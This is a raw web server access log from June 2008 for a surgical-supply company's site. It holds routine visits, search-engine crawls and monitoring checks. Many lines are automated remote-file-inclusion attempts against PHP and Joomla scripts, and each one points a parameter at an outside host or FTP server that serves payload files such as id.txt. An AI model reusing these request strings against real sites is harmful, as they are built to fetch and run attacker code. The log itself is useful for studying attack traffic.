209.62.118.242 - - [30/Jun/2008:00:00:33 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
209.62.118.242 - - [30/Jun/2008:00:00:33 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.812"
209.59.12.99 - - [30/Jun/2008:00:01:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.160.250.141 - - [30/Jun/2008:00:02:25 -0400] "GET /logs//errors.php?error=http://www.condohoteltoronto.com/runs.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
217.160.250.141 - - [30/Jun/2008:00:02:25 -0400] "GET //errors.php?error=http://www.condohoteltoronto.com/runs.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
24.19.163.29 - - [30/Jun/2008:00:02:55 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Tablet PC 2.0)"
24.19.163.29 - - [30/Jun/2008:00:02:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Tablet PC 2.0)"
24.19.163.29 - - [30/Jun/2008:00:03:00 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Tablet PC 2.0)"
24.19.163.29 - - [30/Jun/2008:00:03:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Tablet PC 2.0)"
209.59.12.99 - - [30/Jun/2008:00:06:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.92.108.68 - - [30/Jun/2008:00:11:00 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
61.92.108.68 - - [30/Jun/2008:00:11:01 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
61.92.108.68 - - [30/Jun/2008:00:11:08 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
61.92.108.68 - - [30/Jun/2008:00:11:09 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
59.125.5.1 - - [30/Jun/2008:00:11:31 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
59.125.5.1 - - [30/Jun/2008:00:11:33 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
209.59.12.99 - - [30/Jun/2008:00:11:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.125.5.1 - - [30/Jun/2008:00:11:59 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
59.125.5.1 - - [30/Jun/2008:00:12:00 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
59.126.172.166 - - [30/Jun/2008:00:14:48 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
59.126.172.166 - - [30/Jun/2008:00:14:50 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
195.34.78.106 - - [30/Jun/2008:00:16:15 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
195.34.78.106 - - [30/Jun/2008:00:16:15 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
195.34.78.106 - - [30/Jun/2008:00:16:16 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
195.34.78.106 - - [30/Jun/2008:00:16:16 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.59.12.99 - - [30/Jun/2008:00:16:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.126.172.166 - - [30/Jun/2008:00:17:09 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
59.126.172.166 - - [30/Jun/2008:00:17:10 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.59.12.99 - - [30/Jun/2008:00:21:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.173 - - [30/Jun/2008:00:25:40 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.173 - - [30/Jun/2008:00:25:40 -0400] "GET /logs/ HTTP/1.0" 200 55420 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.15.70.45 - - [30/Jun/2008:00:25:46 -0400] "GET /logs/send_reminders.php?includedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
67.15.70.45 - - [30/Jun/2008:00:25:46 -0400] "GET /logs/send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
67.15.70.45 - - [30/Jun/2008:00:25:46 -0400] "GET /send_reminders.php?includedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
67.15.70.45 - - [30/Jun/2008:00:25:46 -0400] "GET /send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
209.59.12.99 - - [30/Jun/2008:00:26:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [30/Jun/2008:00:31:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.49.13.112 - - [30/Jun/2008:00:34:55 -0400] "GET /logs/mai.php?src=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 210 "-" "libwww-perl/5.811"
65.49.13.112 - - [30/Jun/2008:00:34:55 -0400] "GET /logs/mai.php?src=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 210 "-" "libwww-perl/5.811"
65.49.13.112 - - [30/Jun/2008:00:34:55 -0400] "GET /mai.php?src=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 205 "-" "libwww-perl/5.811"
65.49.13.112 - - [30/Jun/2008:00:34:56 -0400] "GET /mai.php?src=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 205 "-" "libwww-perl/5.811"
67.15.70.45 - - [30/Jun/2008:00:35:01 -0400] "GET /logs/send_reminders.php?includedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
67.15.70.45 - - [30/Jun/2008:00:35:01 -0400] "GET /logs/send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
67.15.70.45 - - [30/Jun/2008:00:35:01 -0400] "GET /send_reminders.php?includedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
67.15.70.45 - - [30/Jun/2008:00:35:01 -0400] "GET /send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
209.59.12.99 - - [30/Jun/2008:00:36:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.125.5.1 - - [30/Jun/2008:00:36:41 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
59.125.5.1 - - [30/Jun/2008:00:36:42 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
209.59.12.99 - - [30/Jun/2008:00:41:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [30/Jun/2008:00:46:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.125.5.1 - - [30/Jun/2008:00:48:34 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
59.125.5.1 - - [30/Jun/2008:00:48:35 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
59.125.5.1 - - [30/Jun/2008:00:50:15 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
59.125.5.1 - - [30/Jun/2008:00:50:16 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
209.59.12.99 - - [30/Jun/2008:00:51:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.20.163.130 - - [30/Jun/2008:00:55:23 -0400] "GET /logs/index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
217.20.163.130 - - [30/Jun/2008:00:55:23 -0400] "GET /index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
63.247.132.129 - - [30/Jun/2008:00:56:22 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
63.247.132.129 - - [30/Jun/2008:00:56:22 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
209.59.12.99 - - [30/Jun/2008:00:56:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [30/Jun/2008:01:01:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [30/Jun/2008:01:06:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [30/Jun/2008:01:11:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.27.47 - - [30/Jun/2008:01:12:49 -0400] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
88.191.27.47 - - [30/Jun/2008:01:12:49 -0400] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
66.249.70.50 - - [30/Jun/2008:01:13:39 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:13:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L4F797D2C73C0D60067D306P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:13:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3F6060213BA004000543082+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:16:17 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F72322F5D10C7009693081+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [30/Jun/2008:01:16:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.70.50 - - [30/Jun/2008:01:19:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F96492C6D30B500F403031+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [30/Jun/2008:01:21:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.70.50 - - [30/Jun/2008:01:23:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3F604A253420640040F306M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [30/Jun/2008:01:26:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.70.50 - - [30/Jun/2008:01:27:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LEF670627348014003113065+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:31:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LEF670627346094003013065+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [30/Jun/2008:01:31:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.241.88.28 - - [30/Jun/2008:01:35:07 -0400] "GET /logs/access_log.Q108051700//sidebar.php?loadpage=http://www.condohoteltoronto.com/runs.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
61.241.88.28 - - [30/Jun/2008:01:35:08 -0400] "GET //sidebar.php?loadpage=http://www.condohoteltoronto.com/runs.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
61.241.88.28 - - [30/Jun/2008:01:35:09 -0400] "GET /logs//sidebar.php?loadpage=http://www.condohoteltoronto.com/runs.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
66.249.70.50 - - [30/Jun/2008:01:35:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L7F658C223CF0C400A2F308J+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [30/Jun/2008:01:36:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.55.206.49 - - [30/Jun/2008:01:38:17 -0400] "GET /logs/access_log.Q108051700//sidebar.php?loadpage=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
200.55.206.49 - - [30/Jun/2008:01:38:19 -0400] "GET //sidebar.php?loadpage=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.65"
200.55.206.49 - - [30/Jun/2008:01:38:20 -0400] "GET /logs//sidebar.php?loadpage=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
66.249.70.50 - - [30/Jun/2008:01:39:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3F6060213BF0E4000A43082+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [30/Jun/2008:01:41:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.70.50 - - [30/Jun/2008:01:44:27 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F6A6E2C9A0063004653001+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:44:37 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L4F7976217BD00600974306N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:44:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3F7954267E50E600FAE307I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:44:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2F7883247020860095F3069+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:45:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3F7954267DE03600F7E307I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:45:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3F7954267E00E600FCE307I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:45:30 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F6A6E2C9A2063004653001+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:45:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F96492C6D503500FA03031+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.49.13.112 - - [30/Jun/2008:01:45:47 -0400] "GET /logs/index2.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
65.49.13.112 - - [30/Jun/2008:01:45:47 -0400] "GET /index2.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
66.249.70.50 - - [30/Jun/2008:01:45:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L4F7976217B80F600964306N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:46:01 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F6A6E2C9AC0B3004B53001+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:46:11 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F77892877B0F600068307D+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:46:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F96492C6CE02500F503031+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:46:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2F78922C79E08600376306C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [30/Jun/2008:01:46:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L4F7976217B503600974306N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.15.70.45 - - [30/Jun/2008:01:49:17 -0400] "GET /logs/index2.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
67.15.70.45 - - [30/Jun/2008:01:49:17 -0400] "GET /logs/index2.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
67.15.70.45 - - [30/Jun/2008:01:49:17 -0400] "GET /index2.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
67.15.70.45 - - [30/Jun/2008:01:49:17 -0400] "GET /index2.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
88.191.27.47 - - [30/Jun/2008:01:49:23 -0400] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
88.191.27.47 - - [30/Jun/2008:01:49:23 -0400] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
209.59.12.99 - - [30/Jun/2008:01:50:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.230.35.101 - - [30/Jun/2008:01:51:14 -0400] "GET /logs/index2.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
87.230.35.101 - - [30/Jun/2008:01:51:14 -0400] "GET /index2.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
210.56.14.156 - - [30/Jun/2008:01:53:03 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
210.56.14.156 - - [30/Jun/2008:01:53:03 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
88.191.27.47 - - [30/Jun/2008:01:53:08 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
88.191.27.47 - - [30/Jun/2008:01:53:08 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
210.56.14.156 - - [30/Jun/2008:01:53:19 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
210.56.14.156 - - [30/Jun/2008:01:53:19 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [30/Jun/2008:01:55:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.163 - - [30/Jun/2008:01:56:13 -0400] "GET /images/ACE_tutor_1Stage_Ridge.pdf HTTP/1.0" 200 1610345 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [30/Jun/2008:02:00:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
71.121.48.45 - - [30/Jun/2008:02:05:30 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:05:30 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:05:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:05:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:05:33 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45965 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:05:37 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:05:37 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:05:37 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:05:38 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:05:38 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
